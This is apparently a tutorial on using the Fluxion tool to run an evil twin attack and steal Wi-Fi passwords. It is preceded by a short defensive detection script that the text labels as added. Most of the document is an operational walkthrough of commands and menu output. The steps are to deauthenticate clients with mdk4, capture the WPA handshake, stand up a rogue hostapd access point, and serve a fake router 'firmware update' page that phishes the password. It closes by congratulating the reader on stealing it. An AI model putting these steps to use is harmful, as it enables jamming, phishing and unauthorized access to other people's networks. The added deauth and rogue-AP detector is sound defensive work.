Nowadays Wi-Fi is everywhere: at home, in the office, in coffee shops and even in the street, but most of the people who use it are not really aware of the cyber threats involved or of how these devices work. Someone using Fluxion can perform an evil twin attack and steal Wi-Fi passwords: a deauthentication attack stops the user from connecting to the real Wi-Fi, a fake Wi-Fi with the same name is created so that the confused user connects to it instead, and a phishing page then tricks the user into handing over the password.
It sounds very complicated, but today anyone can do this with the help of a few tools and scripts like Fluxion, which does all of this just by selecting a few options.
How does Fluxion work?
Fluxion is a well-written script that combines social engineering techniques: phishing, creating a fake access point with the name of the target Wi-Fi, jamming the real Wi-Fi and capturing the handshake. Not only does it capture the handshake, it also verifies the WPA password against it when the user submits the password on the fake page.
It jams the original Wi-Fi and creates a fake clone with the same name, attracting the disconnected users to join the fake one. The fake network serves a login page that pretends the router needs to restart or load firmware and requests the Wi-Fi password to continue.
It keeps jamming the real Wi-Fi until the user enters the real password; if the user enters a wrong one, the process carries on. When the password entered by the user matches the captured handshake, it shuts down the fake Wi-Fi and stops the jamming, so the user is automatically reconnected to the real network without any clue of what happened.
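The mechanism described above leaves two things that a defender can observe over the air: a burst of deauthentication frames carrying the real access point's BSSID, and a second access point beaconing the same network name from an unknown BSSID with weaker security. The following script is an added example, not part of the original article or of Fluxion, showing detection logic for both signatures. It runs over a constructed list of frame records (the timestamps, MAC addresses, network names, threshold and the KNOWN_APS inventory are all made up for the example); in practice the records would come from a monitor-mode capture or a wireless IDS.

```python
"""Detect the two over-the-air signatures of the attack described above:
a deauthentication flood against a network, and an "evil twin" access point
that beacons a known ESSID from a BSSID that is not in the defender's inventory.
All frames, MACs and names below are CONSTRUCTED sample data (not a real capture)."""
from collections import defaultdict

# Constructed sample capture: (timestamp_s, frame_type, bssid, essid, security)
# frame_type is "beacon" or "deauth"; essid/security are only set for beacons.
SAMPLE_FRAMES = [
    (0.0, "beacon", "AA:BB:CC:DD:EE:01", "HomeNet", "WPA2"),
    (0.1, "beacon", "AA:BB:CC:DD:EE:02", "CoffeeShop", "WPA2"),
    (1.0, "beacon", "AA:BB:CC:DD:EE:01", "HomeNet", "WPA2"),
    # burst of deauth frames spoofed with the real AP's BSSID (what jamming looks like)
    *[(1.0 + i * 0.01, "deauth", "AA:BB:CC:DD:EE:01", "", "") for i in range(40)],
    # rogue AP: same name as HomeNet, different BSSID, no encryption
    (1.5, "beacon", "11:22:33:44:55:66", "HomeNet", "OPEN"),
    (2.5, "beacon", "AA:BB:CC:DD:EE:01", "HomeNet", "WPA2"),
    (3.0, "deauth", "AA:BB:CC:DD:EE:02", "", ""),  # one deauth is normal behaviour
]

DEAUTH_THRESHOLD = 10   # frames per window; assumed value, tune to your environment
WINDOW_SECONDS = 1.0    # sliding window length (assumption)

# Defender-maintained inventory: ESSID -> set of legitimate BSSIDs (constructed)
KNOWN_APS = {"HomeNet": {"AA:BB:CC:DD:EE:01"}, "CoffeeShop": {"AA:BB:CC:DD:EE:02"}}


def detect_deauth_flood(frames, threshold=DEAUTH_THRESHOLD, window=WINDOW_SECONDS):
    """Return the set of BSSIDs that sent more than `threshold` deauth frames
    inside any sliding window of `window` seconds."""
    per_bssid = defaultdict(list)
    for ts, ftype, bssid, _, _ in frames:
        if ftype == "deauth":
            per_bssid[bssid].append(ts)
    flooded = set()
    for bssid, times in per_bssid.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # shrink the window from the left until it spans at most `window` seconds
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 > threshold:
                flooded.add(bssid)
                break
    return flooded


def detect_evil_twins(frames, known_aps):
    """Return a list of (essid, rogue_bssid, security) for every beacon that
    advertises a known ESSID from a BSSID missing from the inventory."""
    seen = set()
    rogues = []
    for _, ftype, bssid, essid, security in frames:
        if ftype != "beacon" or essid not in known_aps:
            continue
        if bssid not in known_aps[essid] and (essid, bssid) not in seen:
            seen.add((essid, bssid))
            rogues.append((essid, bssid, security))
    return rogues


if __name__ == "__main__":
    print("deauth flood from:", detect_deauth_flood(SAMPLE_FRAMES))
    print("evil twins:", detect_evil_twins(SAMPLE_FRAMES, KNOWN_APS))
```

On the constructed sample the flood detector flags only AA:BB:CC:DD:EE:01 (forty deauth frames inside 0.4 seconds), not the single deauth from the coffee-shop AP, and the twin detector reports the open "HomeNet" clone at 11:22:33:44:55:66. The inventory check is what makes the second detector useful: the clone is only suspicious because the defender knows which BSSIDs are legitimately allowed to use that name. Networks that deploy 802.11w (protected management frames) make the deauth part of the attack ineffective, because unprotected deauthentication frames are then ignored by clients.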
How to Use and Capture WPA Passwords with Fluxion
(Hardware requirements: a Wi-Fi adapter compatible with Kali Linux that supports packet injection and monitor mode.)
Note: The goal of this article is to make you aware of cyber threats and educate you on cyber security.
Step- 1 Install Fluxion
Open your terminal in Kali Linux and clone the Fluxion Git repository with:
~# git clone https://github.com/FluxionNetwork/fluxion
Cloning into 'fluxion'...
remote: Enumerating objects: 2646, done.
remote: Total 2646 (delta 0), reused 0 (delta 0), pack-reused 2646
Receiving objects: 100% (2646/2646), 26.14 MiB | 83.00 KiB/s, done.
Resolving deltas: 100% (1433/1433), done.
Go to the folder, then list the contents to see the files in it.
~# cd fluxion
~/fluxion# ls
docs install lib logos scripts bin siteinstaller.py
fluxion.sh language locale README.md sites
Then give executable permission to the fluxion.sh file:
~/fluxion# chmod +x fluxion.sh
Then start it up for the first time with ./fluxion.sh (if not root, use sudo ./fluxion.sh). You will likely see the following, where some dependencies may be missing.
~/fluxion# ./fluxion.sh
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 6 < Fluxion Is The Future > ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
aircrack-ng.....OK!
aireplay-ng.....OK!
airmon-ng.......OK!
airodump-ng.....OK!
awk.............OK!
curl............OK!
dhcpd...........Not installed (isc-dhcp-server)
hostapd.........OK!
iwconfig........OK!
lighttpd........Not installed
macchanger......OK!
mdk3............OK!
nmap............OK!
php-cgi.........Not installed
pyrit...........OK!
python..........OK!
unzip...........OK!
xterm...........OK!
openssl.........OK!
rfkill..........OK!
strings.........OK!
fuser...........OK!
Now, to install all the missing packages, type ./fluxion.sh -i
After everything is installed you can proceed to the attack interface. You will see something like this; choose your language by typing the number next to the one you want and pressing Enter.
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 6 < Fluxion Is The Future > ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[2] Select your language
[1] English
[2] German
[3] Romanian
[4] Turkish
[5] Spanish
[6] Chinese
[7] Italian
[8] Czech
[9] Greek
[10] French
[11] Slovenian
Step- 2 Scan Wi-Fi Hotspots
After selecting the language you need to choose the wireless attack for the access point (AP).
Here select option 2, Handshake Spoofer, to capture the handshake .cap file.
[*] Select the wireless attack for access point
[1] Captive Portal Create an "evil twin" access point.
[2] Handshake Spoofer Acquires WPA/WPA2 encryption hashes.
[3] Back
Now you will see the options to select the wireless interface (the Wi-Fi adapter). Select whichever one you like.
Select a wireless interface for target searching.
[1] fluxwl0 Ralink Technology, corp. MT7601U
[2] wlan0 Unknown chipset for SDIO device
[3] Repeat
[4] Back
Then select the channel(s) on which to scan for Wi-Fi networks. You can select any option, but All channels (2.4GHz & 5GHz) is most recommended.
[i] Select channel to monitor
[1] All channels 2.4GHz
[2] All channels 5GHz
[3] All channels (2.4GHz & 5GHz)
[4] Specific channel(s)
[5] Back
Step- 3 Choose Your Target AP
Now it will show you the list of Wi-Fi networks near you, along with each network's security type, the channel it runs on and the MAC address (BSSID) of the router. Select your target Wi-Fi.
WIFI LIST
ID ESSID QLTY PWR CH SECURITY SECURITY BSSID
[001] AndroidAP 96 -61 6 61% WPA2 BC:F6:85:04:A9:98
[002] h@ckgod 100 -55 4 55% WPA2 WPA 84:63:E9:76:A4:E3
Step- 4 Get the handshake
Here you have to select the tool you want to use for jamming the Wi-Fi and kicking the users off the network. You can use any one, but my personal favorite is [3] mdk4 deauthentication.
[*] Select a method for handshake retrieval
[1] Monitor (passive)
[2] aireplay-ng deauthentication (aggressive)
[3] mdk4 deauthentication (aggressive)
Now you will get the option to select the Wi-Fi adapter for monitoring and jamming the Wi-Fi (the same interface you selected before is recommended).
[*] Select a wireless interface for target searching
[1] fluxwl0 Ralink Technology, corp. MT7601U
[2] wlan0 Unknown chipset for SDIO device
[3] Repeat
[4] Back
If the user gives a fake password, all the effort will be pointless. So to verify the password you receive, you need to check it against the captured handshake. Use cowpatty verification, which is recommended.
[*] select a method of verification for the hash
[1] aircrack-ng verification (unreliable)
[2] cowpatty verification (recommended)
[3] pyrit verification
[4] Back
Here select how often the verifier should check the hash. Select the shortest interval available: Every 30 seconds (recommended).
[*] How often should the verifier check the handshake?
[1] Every 30 seconds (recommended)
[2] Every 60 seconds
[3] Every 90 seconds
[4] Back
Select how the verification should occur. Synchronously is generally recommended, but if you have a good, fast system you can select Asynchronously.
[*] How should verification occur?
[1] Asynchronously
[2] Synchronously (recommended)
[3] Back
This starts the attack and three windows open in front of you: the first captures the handshake, the second verifies it and the third sends deauthentication packets to the Wi-Fi network, which stops the users from connecting to it.
Now wait a few moments until you see a blinking message saying "Success: A valid hash was detected and saved".
Now close all the windows. Back in the terminal, select "Select another attack" and hit Enter to proceed.
Step- 5 Setup Captive Portal
This takes you back to the first menu where you started, but this time select the first option, "Captive Portal Create an "evil twin" access point". After selecting it, you will be asked whether you want to continue with the same target Wi-Fi; select "Y" to continue.
[*] Select the wireless attack for access point
[1] Captive Portal Create an "evil twin" access point.
[2] Handshake Spoofer Acquires WPA/WPA2 encryption hashes.
[3] Back
Now choose the Wi-Fi interface for tracking and monitoring your target Wi-Fi again; use the same Wi-Fi adapter you chose previously.
[*] Select a wireless interface for target tracking.
[1] fluxwl0 Ralink Technology, corp. MT7601U
[2] wlan0 Unknown chipset for SDIO device
[3] Repeat
[4] Back
This time you will see the same options again, but read carefully: it is asking you to select the Wi-Fi interface for jamming the target Wi-Fi and stopping users from joining it. Select the same one as before.
[*] Select a wireless interface for target jamming.
[1] fluxwl0 Ralink Technology, corp. MT7601U
[2] wlan0 Unknown chipset for SDIO device
[3] Repeat
[4] Back
The last time the same kind of options appear, it asks you to select the Wi-Fi interface for the access point, i.e. for creating the fake Wi-Fi. For this last option choose the other Wi-Fi adapter.
[*] Select a wireless interface for the access point.
[1] fluxwl0 Ralink Technology, corp. MT7601U
[2] wlan0 Unknown chipset for SDIO device
[3] Repeat
[4] Back
Step- 6 Method Selection
In the method selection you choose the methods and tools used for monitoring, tracking, jamming, creating the fake access point, password verification, etc.
First you have to select the deauthentication method the tool uses to deauth and kick out all the connected users. You can choose any of the following, but mdk4 is the most recommended.
[*] Select a method of deauthentication
[1] mdk4
[2] aireplay
[3] mdk3
Then choose the access point service that creates the fake copy of the Wi-Fi with the same name. hostapd is the recommended choice: it creates a fake hotspot from the information the tool has captured so far. airbase-ng works the same way as hostapd but is a bit slower.
[*] Select an access point service
[1] Rogue AP - hostapd (recommended)
[2] Rogue AP - airbase-ng (slow)
[3] Back
To verify the password received, it has to be checked against the captured handshake. You will see several password verification methods on screen; hash - cowpatty is the most recommended, but you can use the others if you like.
[*] Select a password verification method
[1] hash - cowpatty
[2] hash - aircrack-ng
[3] hash - pyrit
[4] Back
You will see the options below for selecting the captured hash. Select [1] Use hash found; this selects the hash you just obtained with the Handshake Spoofer.
[*] A hash for target AP was found.
[*] Do you want to use this file?
[1] Use hash found
[2] Specific path for hash
[3] Rescan hash directory
[4] Back
Now select the method for verifying the hash; cowpatty verification is highly recommended.
[*] Select a method of verification for the hash
[1] aircrack-ng verification
[2] cowpatty verification
[3] pyrit verification
Step- 7 Create Fake Login
To start the captive portal attack you need to create the fake login page and an SSL certificate for it.
You will see options like the ones below for choosing the SSL certificate. Choose [1] Create a SSL certificate; a window will pop up and generate an RSA private key.
[*] Select SSL certificate source for captive portal
[1] Create a SSL certificate
[2] Search for SSL certificate
[3] None
[4] Back
After creating the SSL certificate, select an internet connectivity type for the rogue network that the disconnected users will join. Disconnected is generally recommended.
[*] Select an internet connectivity type for rogue network.
[1] disconnected
[2] emulated
[3] Back
Now the final step is to choose the fake login page. Select the right language, or the router brand of the target Wi-Fi (TP-Link, D-Link, etc.), and hit Enter.
[*] Select the captive portal interface for the rogue network.
[1] English [ENG] (NEUTRA)
[2] German [GER] (NEUTRA)
[3] Russian [RUS] (NEUTRA)
[4] Italian [IT] (NEUTRA)
[5] Spanish [ESP] (NEUTRA)
[6] Portuguese [POR] (NEUTRA)
[7] Chinese [CN] (NEUTRA)
[8] French [FR] (NEUTRA)
[9] Turkish [TR] (NEUTRA)
[10] Romanian [RO] (NEUTRA)
[11] Hungarian [HU] (NEUTRA)
[12] Arabic [ARA] (NEUTRA)
[13] Greek [GR] (NEUTRA)
[14] Czech [CZ] (NEUTRA)
[15] Norwegian [NO] (NEUTRA)
[16] Bulgarian [BG] (NEUTRA)
[17] Serbian [SRB] (NEUTRA)
[18] Polish [PL] (NEUTRA)
[19] Indonesian [ID] (NEUTRA)
[20] Dutch [NL]
[21] Danish [DAN]
[22] Hebrew [HE]
[23] Thai [TH]
[24] Portuguese [BR]
[25] Slovenian [SVN]
[26] Belkin [ENG]
[27] Netgear [ENG]
[28] Huawei [ENG]
[29] Verizon [ENG]
[30] Netgear [ESP]
[31] Arris [ESP]
[32] Vodafone [ESP]
[33] TP-Link [ENG]
[34] Ziggo [NL]
[35] KPN [NL]
[36] Zigoo2016 [NL]
[37] FRITZBOX_DE [DE]
[38] FRITZBOX_ENG [ENG]
[39] GENEXIS_DE [DE]
[40] Login-Netgear [Login-Netgear]
[41] Login-Xfinity [Login-Xfinity]
[42] Telekom
[43] Google
[44] MOVISTAR [ESP]
[45] Back
Step- 8 Start the attack
Now the attack starts automatically and six windows pop up in front of you. Once the attack starts, the users of the target Wi-Fi are automatically disconnected from it and see two Wi-Fi networks with the same name. They cannot connect to the real network, and their phone automatically connects to the fake one because it is not protected with a password.
As soon as a user connects to your fake network you will see some information in the terminal windows that popped up. On the user's phone a browser opens with a page saying "Wi-Fi framework update" and asking for the password to perform the update. If the user enters a password, the tool verifies it against the hash you captured; if the password is wrong, the page tells the user so and the attack continues. When the user enters the correct password, the user sees the framework "updating", five of the pop-up windows close automatically and the remaining window shows the message "The password was saved in /(path of the file)".
Congrats, you successfully stole the password.